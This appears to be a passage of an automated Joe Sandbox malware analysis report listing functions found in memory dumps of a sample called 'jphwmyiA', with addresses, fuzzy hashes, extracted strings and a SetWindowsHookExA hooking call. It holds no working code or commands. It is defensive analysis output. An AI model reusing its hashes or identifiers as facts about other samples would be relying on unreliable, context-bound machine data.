Opcode Fuzzy Hash: d6dd87ee8aa35f723cd3746e03efd918cb28919fa5cb9ffd2026329fea59e955
Instruction Fuzzy Hash: 2081B574E01618CFDB14DFA9D994A9DBBF2BF88304F14C0A9E818AB365EB349945DF10

Function 2792BA7F Relevance: 2.7, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2792BCE6
PH^q, xrefs: 2792BCF7

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: cb9ddfb6eec96be05ebcf508b0404c5eee758549fdde8aa6f8a28f295fe39b66
Instruction ID: 17342b21fac527da9a65e18543165a03a58cf304fa0a75bcfb7224f959ca4ca5
Opcode Fuzzy Hash: cb9ddfb6eec96be05ebcf508b0404c5eee758549fdde8aa6f8a28f295fe39b66
Instruction Fuzzy Hash: 0681A574E01608CFDB14DFAAD984A9DBBF2BF89304F1480A9E418AB365EB349945DF50

Function 279241EB Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PH^q, xrefs: 27924447
PH^q, xrefs: 27924458

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: c6e611c1e8cc493809a0a9b5aaee19ce444c1737fd59d552cc690b8cf8bd9ac3
Instruction ID: 4f18cf9b86925d0f34767f2436eb9401b8dc41956437bb556ac1ea4045bbdff5
Opcode Fuzzy Hash: c6e611c1e8cc493809a0a9b5aaee19ce444c1737fd59d552cc690b8cf8bd9ac3
Instruction Fuzzy Hash: 6F81A474E00618CFDB14DFAAD984A9DBBF2BF89304F1080A9E809AB365DB349D45DF11

Function 2792B4C7 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2792B737
PH^q, xrefs: 2792B726

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: c529de27889763644650d135ecbf9f55bd000545c88757df51013e25fc6f7a8b
Instruction ID: dc8f2a3db01d4cd8c52e8c384f57001ac86612ad325d5e1c171154034c3dda5b
Opcode Fuzzy Hash: c529de27889763644650d135ecbf9f55bd000545c88757df51013e25fc6f7a8b
Instruction Fuzzy Hash: 7581C574E00608CFDB14DFAAD984A9DBBF2BF88314F10C0A9E418AB365EB749945DF10

Function 2792BD6C Relevance: 2.7, Strings: 2, Instructions: 183COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2792BFD7
PH^q, xrefs: 2792BFC6

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: f885b0634adf6672edf9f4cfccefa4ed3c01e9c3880657646b3599dac53918de
Instruction ID: 940ad467f5df5b989217599e8d742aa17db31809fc175b7e9162be5dae5564c3
Opcode Fuzzy Hash: f885b0634adf6672edf9f4cfccefa4ed3c01e9c3880657646b3599dac53918de
Instruction Fuzzy Hash: 0881C774E00608DFDB14DFA9C984A9DBBF2BF88304F10C0A9E418AB365EB349941DF51

Function 2792AC2C Relevance: 2.7, Strings: 2, Instructions: 183COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2792AE97
PH^q, xrefs: 2792AE86

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 98401eb49a7a24f53235674e404ecb62af4212c168bca55384470f8ce31c0c39
Instruction ID: 7c8884d583ca5e2ea34bc7012789cba6f35b42729f83fda2d3391a7ce07606f3
Opcode Fuzzy Hash: 98401eb49a7a24f53235674e404ecb62af4212c168bca55384470f8ce31c0c39
Instruction Fuzzy Hash: 5581A475E00618DFEB14DFA9D984A9DBBF2BF88304F1080A9E808AB365DB349945DF54

Function 2792B7AB Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2792BA17
PH^q, xrefs: 2792BA06

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 07023f500fd8221ea09b114defed2f03abf64df923ba89b4bf1b30ab0e1733b8
Instruction ID: 865f0038b7b46aa11a4ad7a7df88a08a90adc4a02c949c9300fc6265651ba9e9
Opcode Fuzzy Hash: 07023f500fd8221ea09b114defed2f03abf64df923ba89b4bf1b30ab0e1733b8
Instruction Fuzzy Hash: C981B774E00618CFDB14DFA9D984A9DBBF2BF88304F20D0A9E418AB365EB349945DF11

Function 2792AF0E Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2792B166
PH^q, xrefs: 2792B177

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 3ab0df551b5ec489bf0c2ac5f4f35fee9bdcad9279c2d9896076c99641e5ddf7
Instruction ID: a66fcaf040588d637446bfaedec59852b4f20e221af7968eb4650b06105aa338
Opcode Fuzzy Hash: 3ab0df551b5ec489bf0c2ac5f4f35fee9bdcad9279c2d9896076c99641e5ddf7
Instruction Fuzzy Hash: 4A81B974E00618CFDB14DFA9D984A9DBBF2BF88304F10C0A9E418AB369EB349945DF50

Function 29256C18 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PH^q, xrefs: 29256E63
PH^q, xrefs: 29256E52

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: b1e2153640c5078ca40d7bdc5e7c6c68316a6dd4fb991c84c0a6aba7b516274c
Instruction ID: 8fa2cce0935caeba554131096f893e0bb51f3213f969c974dbc2185a5622d12e
Opcode Fuzzy Hash: b1e2153640c5078ca40d7bdc5e7c6c68316a6dd4fb991c84c0a6aba7b516274c
Instruction Fuzzy Hash: 2981DE70E00218CFDB58DFAAD994B9DBBF2BF89301F20806AD419AB354DB345986CF50

Function 29247A28 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16806ebf4cf48884619b8c560a9c1897a6c86809c3f13f0ebba2fc390fa3cbe5
Instruction ID: 24aa95b4db56a5075196600fb87a22d009bb80551126bba49f150e716a5e5fa2
Opcode Fuzzy Hash: 16806ebf4cf48884619b8c560a9c1897a6c86809c3f13f0ebba2fc390fa3cbe5
Instruction Fuzzy Hash: 12F1F674E01218CFDB18DFA9D884B9DBBB6BF48304F10D1A9E418AB355DB749986CF50

Function 29AFCCB9 Relevance: 1.8, APIs: 1, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4146339671.0000000029AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 29AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29af0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a219b907c4ee0a9785564382e4e5d03e688a677115ab88021b2aad9802d2356
Instruction ID: 5dc1446d1a1975f52e6dd23ab7ff500203d37a8ca1de634007b9f3223cbe80d4
Opcode Fuzzy Hash: 8a219b907c4ee0a9785564382e4e5d03e688a677115ab88021b2aad9802d2356
Instruction Fuzzy Hash: DAD17D30A00309CFDB09DFA5C988B9DBBF6BF54B04F158159E409AF2A5DB76E946CB40

Function 29AF0628 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,?,?,?), ref: 29AF06E1

Memory Dump Source

Source File: 00000003.00000002.4146339671.0000000029AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 29AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29af0000_jphwmyiA.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 570d0eae88186704a9c1223412786e5e4634749dd6e5014c01f2b87e2d6be18d
Instruction ID: 76f7e02351a89f65322416da02d544acd05515c3c12d3dc2aa0484c098b3275b
Opcode Fuzzy Hash: 570d0eae88186704a9c1223412786e5e4634749dd6e5014c01f2b87e2d6be18d
Instruction Fuzzy Hash: F64198B4D00258DFCB04DFA9D984A9EFBB1BB59310F10942AE818B7220D775A946CF58

Function 29AF0630 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,?,?,?), ref: 29AF06E1

Memory Dump Source

Source File: 00000003.00000002.4146339671.0000000029AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 29AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29af0000_jphwmyiA.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: d7a2f22786408e207dc0bfebd68bd7601954ec6d1e410af40a05368717073a26
Instruction ID: 5081538b12477de161aad1d129a5ca1163df02c4be92b78357970071fc414c3a
Opcode Fuzzy Hash: d7a2f22786408e207dc0bfebd68bd7601954ec6d1e410af40a05368717073a26
Instruction Fuzzy Hash: D24187B4D002589FCB14CFA9D984A9EFBF1BB59310F10942AE818B7220D775A946CF58

Function 29307618 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

(bP%, xrefs: 29307889, 293078A3

Memory Dump Source

Source File: 00000003.00000002.4144666290.0000000029300000.00000040.00000800.00020000.00000000.sdmp, Offset: 29300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29300000_jphwmyiA.jbxd

Similarity

API ID:
String ID: (bP%
API String ID: 0-4264480400
Opcode ID: 829d6be9ae684c54b5372c1756bdcfb9a97f451b37ed740f30591cd7ebcb52fd
Instruction ID: 150d159d2baa33234d9bac17fdc91b0cf168db39f049f1de1ec922f09ab534ed
Opcode Fuzzy Hash: 829d6be9ae684c54b5372c1756bdcfb9a97f451b37ed740f30591cd7ebcb52fd
Instruction Fuzzy Hash: B981C574E00218DFDB08DFA9C990A9DBBB2FF88304F209169D509BB354DB399986CF54

Function 2930ECD8 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

(bP%, xrefs: 2930EF49, 2930EF63

Memory Dump Source

Source File: 00000003.00000002.4144666290.0000000029300000.00000040.00000800.00020000.00000000.sdmp, Offset: 29300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29300000_jphwmyiA.jbxd

Similarity

API ID:
String ID: (bP%
API String ID: 0-4264480400
Opcode ID: 15a52b0e373b32b5447cb85b39840c61394f79e5ba2e110be04fa0030b4d889e
Instruction ID: 3e167dfb33373968d9636b05ca2b93ce69dd18a3def5fec918bf35c437cc5aec
Opcode Fuzzy Hash: 15a52b0e373b32b5447cb85b39840c61394f79e5ba2e110be04fa0030b4d889e
Instruction Fuzzy Hash: E581B474E00218DFDB18DFA9C990A9DBBB2FF88304F209169D519BB358DB395986CF50

Function 29258020 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

r#), xrefs: 29258020

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID: r#)
API String ID: 0-3628094162
Opcode ID: 52d403fca7af02efdb8e376d959b1310ef24dc60b9c7cff436a2ca16e3915559
Instruction ID: fa89f6040942c9917266c92d120e0d6088289228c94c93148d8ce7e8b6233dc4
Opcode Fuzzy Hash: 52d403fca7af02efdb8e376d959b1310ef24dc60b9c7cff436a2ca16e3915559
Instruction Fuzzy Hash: BE713875E012089FDB08DFE9D890A9EBBF2FF88314F14D069E908AB355DB309942CB11

Function 29AF08A9 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

LR^q, xrefs: 29AF08F6

Memory Dump Source

Source File: 00000003.00000002.4146339671.0000000029AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 29AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29af0000_jphwmyiA.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 9736f3f093e072e184bb28f87ee2b5989a0a9f29851948c682e5bb05a279a302
Instruction ID: 7e0dfa60f61faae0d7c4be21f887b038bd39d4b17fff15d3d6308ccc7fd4d3c5
Opcode Fuzzy Hash: 9736f3f093e072e184bb28f87ee2b5989a0a9f29851948c682e5bb05a279a302
Instruction Fuzzy Hash: 04310330D012199FDB05DFA5C884AEEBBF1BF49700F105469D404B7290D7795A85CF95

Function 29AF08B8 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

LR^q, xrefs: 29AF08F6

Memory Dump Source

Source File: 00000003.00000002.4146339671.0000000029AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 29AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29af0000_jphwmyiA.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: b2d3e79cb3c760e5da1c9df8848da27284dd9791c0facb5b34534f110d6f6920
Instruction ID: de5534992ef585614f380e72e9f580e570e868a9f1c7859fa25af688d5da00ff
Opcode Fuzzy Hash: b2d3e79cb3c760e5da1c9df8848da27284dd9791c0facb5b34534f110d6f6920
Instruction Fuzzy Hash: C0310130E012199FDB04DFA5C884BEEBBF2BF49700F109469E404B7280DB799A85CF95

Function 2931CA90 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144755266.0000000029310000.00000040.00000800.00020000.00000000.sdmp, Offset: 29310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29310000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5f12d14acabd50e8809cc81dacfdf62efb0f1c794279ff7e4cd264aca91404f
Instruction ID: 0d79bd9b92848d1366dc9cec52c8e115d0ad8ae2f01f6a189bacca69fc4a66d7
Opcode Fuzzy Hash: d5f12d14acabd50e8809cc81dacfdf62efb0f1c794279ff7e4cd264aca91404f
Instruction Fuzzy Hash: B6827C74E012288FDB68DF69C994BDDBBB2BF89300F1081EA944DA7265DB355E85CF40

Function 2792F0CB Relevance: .7, Instructions: 710COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c870c7c0cb6cfaaefd9bfb38a28b612efebaf40d183ac30a576c54af27fe194f
Instruction ID: 9c5bf026d53c503e52297cfbfe0781104dabfb6966113fd79137f96b9f711680
Opcode Fuzzy Hash: c870c7c0cb6cfaaefd9bfb38a28b612efebaf40d183ac30a576c54af27fe194f
Instruction Fuzzy Hash: FA72BFB4E016298FDB64DF69C984BD9BBB2BB49304F1091E9D50CA7355EB349E81CF40

Function 2931E1C8 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144755266.0000000029310000.00000040.00000800.00020000.00000000.sdmp, Offset: 29310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29310000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a24e74bbfc1313a560836adf64858d8b1e78fceaed40d52414cd405fce4bb4
Instruction ID: ada69cc9bcab3323a8a565f52337dd688747d9abeb18d8486d924cf56eab674f
Opcode Fuzzy Hash: 52a24e74bbfc1313a560836adf64858d8b1e78fceaed40d52414cd405fce4bb4
Instruction Fuzzy Hash: 8B729F74E012288FDB69DF69C984BDDBBB2BF48300F1081E9A44DA7265DB355E85CF41

Function 292565C0 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a3a58ae5b151d35bc893f399547eefbe3b259317996d1f13c2785e0391b0f5
Instruction ID: dad10875bf95c7114a97d7eab59fa444391afeea15835d9939ce671d3909c372
Opcode Fuzzy Hash: 58a3a58ae5b151d35bc893f399547eefbe3b259317996d1f13c2785e0391b0f5
Instruction Fuzzy Hash: A1E1C3B4E01218CFEB18DFA5C984B9DBBB2BF89304F2080A9D409B7395DB355A85CF51

Function 29300E98 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144666290.0000000029300000.00000040.00000800.00020000.00000000.sdmp, Offset: 29300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29300000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7b2e33668e488e823178ab4bfc6a027cd9af5bdfedcde67b517b29e04421838
Instruction ID: 0d3536ad6cfaae666f2ad8a1168e25f74ce78946b2b1f37af008e5ea1aa86b5d
Opcode Fuzzy Hash: e7b2e33668e488e823178ab4bfc6a027cd9af5bdfedcde67b517b29e04421838
Instruction Fuzzy Hash: C4D1A074E01218CFDB58DFA5C994B9DBBB2BF89304F2090A9D409AB354DB359E86CF50

Function 292C5438 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144521781.00000000292C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 292C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_292c0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b649d91afd34b9a7889996028507a94f5c3ba5c53bbab0c10fdb858ce579f27e
Instruction ID: e0394233ea7c7a7e8306e0abd54c97f013fb2618c56aefa3749e9ff017ea7d5a
Opcode Fuzzy Hash: b649d91afd34b9a7889996028507a94f5c3ba5c53bbab0c10fdb858ce579f27e
Instruction Fuzzy Hash: 69D1BF74E00218CFDB54DFA5C994B9DBBB2BF89304F2091A9D508AB354DB359E86CF50

Function 29257AF0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a1b3730363fe3337faff21d70e02d8f41f1aac640c9fe5363b341846c4cb63
Instruction ID: 59c08ffcf71bb1848f5479b6a6337eb2bd68f2bfdce4c5cb3ec876563d6ced17
Opcode Fuzzy Hash: c8a1b3730363fe3337faff21d70e02d8f41f1aac640c9fe5363b341846c4cb63
Instruction Fuzzy Hash: B7D1C174E00218CFDB58DFA9C990B9DBBB2BF89300F1090A9D909AB355DB359D86CF51

Function 292C0DB8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144521781.00000000292C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 292C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_292c0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc7576770483a71945274cb9ed263f610cb2e8a8747b41ebb543e84ef5a10ec7
Instruction ID: ff247b0602463087588fcdcaf1b9d7a76951bccb4b8c69acb5259960712d657f
Opcode Fuzzy Hash: cc7576770483a71945274cb9ed263f610cb2e8a8747b41ebb543e84ef5a10ec7
Instruction Fuzzy Hash: EBD1C074E01218CFDB14DFA5C980B9DBBB2BF89300F2090A9D909AB355DB35AD86CF51

Function 2924B580 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c99f88bba8c3b189a7095ad4f544e996caf51f8d4d7ac568db3bc2696e745250
Instruction ID: 2bc4055d1d8c3698bf1bb1e7f7f0b41a8d40217305cc8d43f8307b395d6eeeb1
Opcode Fuzzy Hash: c99f88bba8c3b189a7095ad4f544e996caf51f8d4d7ac568db3bc2696e745250
Instruction Fuzzy Hash: 37C1A374E00218CFDB58DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 29240E38 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e949be292586c45259d4c5626fc489c6d300cfe259df5279fc87d3bb3ed10ea
Instruction ID: af3ec878685581abc3e4d9714e6422b2fe256612fdb450de3b7c60c9d1d29953
Opcode Fuzzy Hash: 6e949be292586c45259d4c5626fc489c6d300cfe259df5279fc87d3bb3ed10ea
Instruction Fuzzy Hash: C7C19074E01318CFDB54DFA5C994B9DBBB2BF88304F2090A9D809A7355DB359A85CF10

Function 292534C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ef76adff0f7d1b8e3c9eab49e9ad0194d8cd4d24c229a2a5fa6e16ecd15b6c
Instruction ID: 849029eadda7021d0f385853b6ae974fc66dfead3f9d2a654a4d74eab42f31f8
Opcode Fuzzy Hash: 57ef76adff0f7d1b8e3c9eab49e9ad0194d8cd4d24c229a2a5fa6e16ecd15b6c
Instruction Fuzzy Hash: 4CC1A374E01218CFDB18DFA5C994B9DBBB2BF89304F2090A9D809AB355DB359E85CF50

Function 29323538 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb8d278b3e5390e32453a1eb99997ee41a350a0291678f65e90d12cf5e498470
Instruction ID: bc94e2cf3fc5f99ca0cae75210106ed922fc92d7eb1d5aaf6ae70453de2f1b14
Opcode Fuzzy Hash: eb8d278b3e5390e32453a1eb99997ee41a350a0291678f65e90d12cf5e498470
Instruction Fuzzy Hash: 0F915B719116198FDB08AFA0C568BEEBBB2EF46716F205429D202772D0CF7C4A45CF95

Function 29323548 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c233535a235ecc7051b35593e2aa40269b4a9af2a99f3ef6ebd005b42b9228d1
Instruction ID: ccab3c95d7e77ebca87fc4377a3b8977ee936376179b0c791f00718fa3c72dd7
Opcode Fuzzy Hash: c233535a235ecc7051b35593e2aa40269b4a9af2a99f3ef6ebd005b42b9228d1
Instruction Fuzzy Hash: 85915B71911619CFDB08AFA0C558BEEBBB2EB46716F205429D202772D0CF7C4A45CF99

Function 29241440 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12479727536d9dde3aaac0235fcda60361c15b3f94b871f1090d83e0fa4e7602
Instruction ID: a84dc59a9b5ff04a6fa8203fa663b0dca36d74874ece1564162240acacfd9012
Opcode Fuzzy Hash: 12479727536d9dde3aaac0235fcda60361c15b3f94b871f1090d83e0fa4e7602
Instruction Fuzzy Hash: 01A11370D00218CFEB14DFA9C984BDDBBB1BF89304F209269E509B7292DB749985CF55

Function 2924178B Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2896fd6f9e92ed614f81e3032417d7199d36f43989a6174484b1821e986dd968
Instruction ID: 636b4b927ea86920b3db46f91bb19fda693c18f986950a80ac42fccd74bfe536
Opcode Fuzzy Hash: 2896fd6f9e92ed614f81e3032417d7199d36f43989a6174484b1821e986dd968
Instruction Fuzzy Hash: 6791F270D00218CFEB14DFA8C984BDDBBB1BF49314F2092A9E509BB292DB749985CF55

Function 29316440 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144755266.0000000029310000.00000040.00000800.00020000.00000000.sdmp, Offset: 29310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29310000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffd3d111a010a3c6f4b09a9708fd5235e7f9b09a85d1d5076777ec589984ed97
Instruction ID: d0b89f9b3b8b6551356b1bfe7d0fdf79964e75e81663a9a60c1b652507d054f0
Opcode Fuzzy Hash: ffd3d111a010a3c6f4b09a9708fd5235e7f9b09a85d1d5076777ec589984ed97
Instruction Fuzzy Hash: 1B81B474E00218DFDB18DFE9C990A9DBBB2BF88304F209169D505BB358DB395946CF50

Function 2930EFF8 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144666290.0000000029300000.00000040.00000800.00020000.00000000.sdmp, Offset: 29300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29300000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc74c4b41a282684ff0fd6de2106bc3b1e95590729710c58bb36fa3cc62cd9a0
Instruction ID: 03a9bd3e3a8f8eab11b4c9ed98210b6c403d516a341e48182d7858ef343136f0
Opcode Fuzzy Hash: bc74c4b41a282684ff0fd6de2106bc3b1e95590729710c58bb36fa3cc62cd9a0
Instruction Fuzzy Hash: 7C81B474E00218DFDB08DFA9C990A9DBBB2FF88304F609169D509BB394DB395946CF50

Function 2792D490 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea8f05c377612f369f69a6fa81cbd5f60657718e23824de5252d725167be56b
Instruction ID: f6e8a629ace75da27ceb2dd7be3b00563b2d765bb35e4d26325fa5db983106b1
Opcode Fuzzy Hash: dea8f05c377612f369f69a6fa81cbd5f60657718e23824de5252d725167be56b
